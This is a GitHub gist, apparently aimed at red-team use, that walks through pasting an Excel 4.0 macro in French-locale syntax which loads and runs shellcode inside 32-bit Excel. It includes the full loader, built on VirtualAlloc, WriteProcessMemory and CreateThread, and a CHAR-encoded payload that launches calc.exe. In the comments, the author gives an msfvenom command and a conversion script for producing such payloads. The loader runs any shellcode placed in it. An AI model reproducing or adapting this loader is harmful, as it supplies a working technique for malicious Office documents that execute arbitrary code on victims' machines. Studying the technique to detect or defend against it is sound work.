Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL
1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"
================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
================================================================================
=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
=VAlloc(0;4096;4096;64)
=SELECTIONNER(B1:B50;B1)
=POSER.VALEUR(C1;0)
=TANT.QUE(CELLULE.ACTIVE()<>"END")
=POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE()))
=WProcessMemory(-1; A4 + (C1 * 255); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0)
=POSER.VALEUR(C1; C1 +1)
=SELECTIONNER(;"L(1)C")
=SUIVANT()
=CThread(0;0;A4;0;0;0)
=ARRETER()
================================================================================
In the Macro1 worksheet, paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe):
================================================================================
=CAR(217)&CAR(238)&CAR(184)&CAR(239)&CAR(216)&CAR(65)&CAR(149)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(95)&CAR(49)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(199)&CAR(4)&CAR(49)&CAR(71)&CAR(20)&CAR(3)&CAR(71)&CAR(251)&CAR(58)&CAR(180)&CAR(105)&CAR(235)&CAR(57)&CAR(55)&CAR(146)&CAR(235)&CAR(93)&CAR(177)&CAR(119)&CAR(218)&CAR(93)&CAR(165)&CAR(252)&CAR(76)&CAR(110)&CAR(173)&CAR(81)&CAR(96)&CAR(5)&CAR(227)&CAR(65)&CAR(243)&CAR(107)&CAR(44)&CAR(101)&CAR(180)&CAR(198)&CAR(10)&CAR(72)&CAR(69)&CAR(122)&CAR(110)&CAR(203)&CAR(197)&CAR(129)&CAR(163)&CAR(43)&CAR(244)&CAR(73)&CAR(182)&CAR(42)&CAR(49)&CAR(183)&CAR(59)&CAR(126)&CAR(234)&CAR(179)&CAR(238)&CAR(111)&CAR(159)&CAR(142)&CAR(50)&CAR(27)&CAR(211)&CAR(31)&CAR(51)&CAR(248)&CAR(163)&CAR(30)&CAR(18)&CAR(175)&CAR(184)&CAR(120)&CAR(180)&CAR(81)&CAR(109)&CAR(241)&CAR(253)&CAR(73)&CAR(114)&CAR(60)&CAR(183)&CAR(226)&CAR(64)&CAR(202)&CAR(70)&CAR(35)&CAR(153)&CAR(51)&CAR(228)&CAR(10)&CAR(22)&CAR(198)&CAR(244)&CAR(75)&CAR(144)&CAR(57)&CAR(131)&CAR(165)&CAR(227)&CAR(196)&CAR(148)&CAR(113)&CAR(158)&CAR(18)&CAR(16)&CAR(98)&CAR(56)&CAR(208)&CAR(130)&CAR(78)&CAR(185)&CAR(53)&CAR(84)&CAR(4)&CAR(181)&CAR(242)&CAR(18)&CAR(66)&CAR(217)&CAR(5)&CAR(246)&CAR(248)&CAR(229)&CAR(142)&CAR(249)&CAR(46)&CAR(108)&CAR(212)&CAR(221)&CAR(234)&CAR(53)&CAR(142)&CAR(124)&CAR(170)&CAR(147)&CAR(97)&CAR(128)&CAR(172)&CAR(124)&CAR(221)&CAR(36)&CAR(166)&CAR(144)&CAR(10)&CAR(85)&CAR(229)&CAR(254)&CAR(205)&CAR(235)&CAR(147)&CAR(76)&CAR(205)&CAR(243)&CAR(155)&CAR(224)&CAR(166)&CAR(194)&CAR(16)&CAR(111)&CAR(176)&CAR(218)&CAR(242)&CAR(212)&CAR(78)&CAR(145)&CAR(95)&CAR(124)&CAR(199)&CAR(124)&CAR(10)&CAR(61)&CAR(138)&CAR(126)&CAR(224)&CAR(1)&CAR(179)&CAR(252)&CAR(1)&CAR(249)&CAR(64)&CAR(28)&CAR(96)&CAR(252)&CAR(13)&CAR(154)&CAR(152)&CAR(140)&CAR(30)&CAR(79)&CAR(159)&CAR(35)&CAR(30)&CAR(90)&CAR(252)&CAR(162)&CAR(140)&CAR(6)&CAR(45)&CAR(65)&CAR(53)&CAR(172)&CAR(49)
END
@surajpkhetani

This comment has been minimized.

Copy link

@surajpkhetani surajpkhetani commented May 28, 2019

Noob question. How did you generate the shellcode?

@Arno0x

This comment has been minimized.

Copy link
Owner Author

@Arno0x Arno0x commented May 28, 2019

  1. msfvenom, from the metasploit framework, for the shellcode payload generation, beware you have to avoid '0', so something like this:
    msfvenom -a x86 -p windows/exec -f raw cmd=calc.exe -b '\00' > shellcode.bin
  2. Then you can use my tranformFile.py script to transform this shellcode into a list of CHAR (or CAR in french MS-Office): transformFile.py:
    ./transformFile.py -i shellcode.bin -f xlm
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.